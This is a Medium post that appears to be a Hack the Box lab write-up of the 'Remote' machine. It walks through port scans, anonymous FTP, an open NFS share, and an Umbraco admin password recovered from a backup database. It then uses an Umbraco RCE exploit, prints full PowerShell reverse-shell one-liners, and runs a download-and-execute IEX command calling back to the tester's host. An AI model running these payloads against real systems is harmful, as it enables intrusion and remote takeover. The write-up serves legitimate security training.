Hack the Box Remote

nmap -T4 -p- 10.10.10.180 -oA 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 07:43 EDT
Nmap scan report for 10.10.10.180
Host is up (0.025s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49678/tcp open unknown
49679/tcp open unknown
49680/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 452.22 seconds
root@cainta:~/Documents/htb/Remote# ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.
=========================Starting nikto scan- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.180
+ Target Hostname: 10.10.10.180
+ Target Port: 80
+ Start Time: 2020-06-04 04:32:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server banner has changed from '' to 'Microsoft-IIS/10.0' which may suggest a WAF, load balancer or proxy is in place
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /intranet/: This might be interesting...
+ /umbraco/ping.aspx: Umbraco ping page found
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-06-04 04:38:18 (GMT-4) (320 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Finished nikto scan=========================
root@cainta:~/Documents/htb/Remote# showmount -h
Usage: showmount [-adehv]
[--all] [--directories] [--exports]
[--no-headers] [--help] [--version] [host]
root@cainta:~/Documents/htb/Remote# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@cainta:~/Documents/htb/Remote# mkdir /tmp/nfs
root@cainta:~/Documents/htb/Remote# mount -t nfs 10.10.10.180:/site_backups /tmp/nfs/ -nolock
root@cainta:~/Documents/htb/Remote#
root@cainta:/tmp/nfs# ls -latr
total 123
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 28539 Feb 20 00:57 Web.config
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 12:16 bin
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 css
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Config
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Media
drwx------ 2 nobody 4294967294 64 Feb 20 12:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 12:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 12:16 Views
drwx------ 2 nobody 4294967294 4096 Feb 20 12:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 23 13:35 .
drwxrwxrwt 20 root root 4096 Jun 4 06:19 ..
root@cainta:/tmp/nfs#
root@cainta:/tmp/nfs/App_Data# strings Umbraco.sdf | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
baconandcheese
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c ipconfigWindows IP ConfigurationEthernet adapter Ethernet0 2:Connection-specific DNS Suffix  . :
IPv6 Address. . . . . . . . . . . : dead:beef::453a:bc1d:f838:7960
Link-local IPv6 Address . . . . . : fe80::453a:bc1d:f838:7960%13
IPv4 Address. . . . . . . . . . . : 10.10.10.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d57%13
10.10.10.2
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c hostname
remote
root@cainta:~/Documents/htb/Remote/10.10.10.180/Umbraco-RCE# python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c whoami
iis apppool\defaultapppool
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.37',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while
(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetB
ytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.37',4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -
ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.L
ength)}
Save this as 'reverse.ps1' python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.37:80/reverse.ps1')"Serve via SimpleHTTP serverroot@cainta:~/Documents/htb/Remote/10.10.10.180# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.180 - - [04/Jun/2020 08:36:02] "GET /reverse.ps1 HTTP/1.1" 200 -


Reverse shell
root@cainta:~/Documents/htb/Remote# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.180] 49710

PS C:\windows\system32\inetsrv> cd c:\
PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 6/4/2020 5:47 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows


PS C:\> cd Users
PS C:\Users> dir
PS C:\Users\Public> dirDirectory: C:\Users\PublicMode                LastWriteTime         Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 6/4/2020 9:27 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 6/4/2020 6:48 AM 34 user.txt
  • Initial foothold is a bit challenging but we have to ‘try harder’ and find other ways / avenue and be creative.

--

--

--

InfoSec, Dad, Jack of All Trades and Master of None

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Slingshot Bird Sling Shooter Hack Free Resources Generator

2 Steps To Reclaim Your Online Privacy

Nonce-based Content Security Policy (CSP) in Rails

Let’s Encrypt vs Traditional SSL

Monthly Recap — August 2021

Behind The Scenes: Obscuring Screenshots for Medium Articles

Post Office — DaVinciCTF — Writeup

US suspects Russian hackers for snooping into emails

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Arcy Caparros

Arcy Caparros

InfoSec, Dad, Jack of All Trades and Master of None

More from Medium

Vue3: Learning Review

A web portal where to upload photos: Photobook

Simplifying CRUD operations using budibase

How To Install Odoo 14 On Ubuntu 18.04 ?